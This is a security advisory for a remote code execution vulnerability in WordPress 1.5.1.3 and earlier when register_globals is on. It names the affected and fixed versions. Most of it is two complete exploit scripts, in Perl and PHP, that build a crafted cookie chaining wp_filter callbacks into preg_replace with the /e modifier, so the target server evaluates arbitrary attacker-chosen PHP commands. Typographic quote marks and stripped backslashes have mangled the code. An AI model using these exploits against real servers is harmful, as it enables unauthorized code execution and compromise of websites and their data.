‘WordPress Command Execution Vulnerability (Cache_lastpostdate)’

Summary

A vulnerability in WordPress’s handling of incoming cookie information allows remote attackers to cause the program to execute arbitrary code if the PHP settings of register_globals has been set to On.’

Credit:

‘The information has been provided by Kartoffelguru.’


Details

Vulnerable Systems:
 * WordPress version 1.5.1.3 and prior (with register_globals)

Immune Systems:
 * WordPress version 1.5.1.4 or newer

Perl Exploit:
#!/usr/bin/perl
use strict;
use MIME::Base64 qw(encode_base64 decode_base64);
use IO::Socket;

print ‘WordPress <= 1.5.1.3 – remote code execution 0-DDAAYY exploit (Converted by Noam)n’;
print ‘(C) Copyright 2005 Kartoffelgurunn’;
print ‘[!] info: requires register_globals turned on on target hostnn’;

if (@ARGV < 2)
{
 die (‘usage:nt./wpx.php http://www.xyz.net/blog/ ‘system(‘uname -a;id’);’nn’);
}

my $url = shift;
my $cmd = shift;

if (length($cmd)==0)
{
 $cmd = ‘phpinfo();’;
}

#print ‘code: ‘.encode_base64($cmd, ”).’n’;
my @code = unpack(‘C*’, encode_base64($cmd, ”));
#print ‘code: @coden’;
my $cnv = ”;
for (my $i=0;$i<@code; $i++)
{
 $cnv.= ‘chr(‘.$code[$i].’).’;
}
$cnv.=’chr(32)’;
#print ‘cnv: $cnvn’;

my $str = encode_base64(‘args[0]=eval(base64_decode(‘.$cnv.’)).die()&args[1]=x’, ”);
#print ‘str: [$str]n’;

my $cookie=’wp_filter[query_vars][0][0][function]=get_lastpostdate;’. ‘wp_filter[query_vars][0][0][accepted_args]=0;’;
$cookie.=’wp_filter[query_vars][0][1][function]=base64_decode;’. ‘wp_filter[query_vars][0][1][accepted_args]=1;’;
$cookie.=’cache_lastpostmodified[server]=//e;cache_lastpostdate[server]=’;
$cookie.=$str;
$cookie.=’;wp_filter[query_vars][1][0][function]=parse_str;’. ‘wp_filter[query_vars][1][0][accepted_args]=1;’;
$cookie.=’wp_filter[query_vars][2][0][function]=get_lastpostmodified;’ . ‘wp_filter[query_vars][2][0][accepted_args]=0;’;
$cookie.=’wp_filter[query_vars][3][0][function]=preg_replace;’ . ‘wp_filter[query_vars][3][0][accepted_args]=3;’;

$url =~ /http://([^/]+)/(.*?)/;

my $hostname = $1;

my $path = $2;
my $Request = ‘GET /$path HTTP/1.1r
Host: $hostnamer
Cookie: $cookier
Referer: $hostnamer
Connection: closer
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)r
r
‘;

my $socket = IO::Socket::INET->new ( Proto => ‘tcp’, PeerAddr => $hostname, PeerPort => 80);
unless ($socket) { die ‘cannot connect to http daemon on $hostname’ }

print ‘Request: [$Request]n’;
print $socket $Request;

while (<$socket>)
{
 print $_;
}

PHP Exploit:
<?php
    echo ‘WordPress <= 1.5.1.3 – remote code execution 0-DDAAYY exploitn’;
    echo ‘(C) Copyright 2005 Kartoffelgurunn’;
    echo ‘[!] info: requires register_globals turned on on target hostnn’;
    if (!extension_loaded(‘curl’)) {
        die (‘[-] you need the curl extension activated…n’);
    }

    function usage()
    {
        die (‘usage:nt./wpx.php -h http://www.xyz.net/blog/ -c ‘system(‘uname -a;id’);’nn’);
    }

    $options = getopt(‘h:c:’);
    if (count($options) < 1 || !isset($options[‘h’])) {
        usage();
    }

    $host = (is_array($options[‘h’]) ? $options[‘h’][0]:$options[‘h’]);
    $cmd = (is_array($options[‘c’]) ? $options[‘c’][0]:$options[‘c’]);

    if (!preg_match(‘/^http:///’, $host, $dummy)) {
        usage();
    }

    if (strlen(trim($cmd))==0) {
        $cmd = ‘phpinfo();’;
    }

    $code = base64_encode($cmd);
    echo ‘code: $coden’;
    $cnv = ”;
    for ($i=0;$i<strlen($code); $i++) {
        $cnv.= ‘chr(‘.ord($code[$i]).’).’;
    }
    $cnv.=’chr(32)’;
    echo ‘cnv: $cnvn’;

    $str = base64_encode(‘args[0]=eval(base64_decode(‘.$cnv.’)).die()&args[1]=x’);

    $cookie=’wp_filter[query_vars][0][0][function]=get_lastpostdate;’ . ‘wp_filter[query_vars][0][0][accepted_args]=0;’;
    $cookie.=’wp_filter[query_vars][0][1][function]=base64_decode;’ . ‘wp_filter[query_vars][0][1][accepted_args]=1;’;
    $cookie.=’cache_lastpostmodified[server]=//e;cache_lastpostdate[server]=’;
    $cookie.=$str;
    $cookie.=’;wp_filter[query_vars][1][0][function]=parse_str;’ . ‘wp_filter[query_vars][1][0][accepted_args]=1;’;
    $cookie.=’wp_filter[query_vars][2][0][function]=get_lastpostmodified;’ . ‘wp_filter[query_vars][2][0][accepted_args]=0;’;
    $cookie.=’wp_filter[query_vars][3][0][function]=preg_replace;’ . ‘wp_filter[query_vars][3][0][accepted_args]=3;’;

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $host);
    curl_setopt($ch, CURLOPT_POST, 0);
    curl_setopt($ch, CURLOPT_COOKIE, $cookie);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_CURLOPT_REFERER, $host);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, ‘Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)’);
    curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);
    echo ‘[+] now executingnn’;

    $r = curl_exec($ch);
    curl_close($ch);

    echo $r;

?>’

Categories: UNIX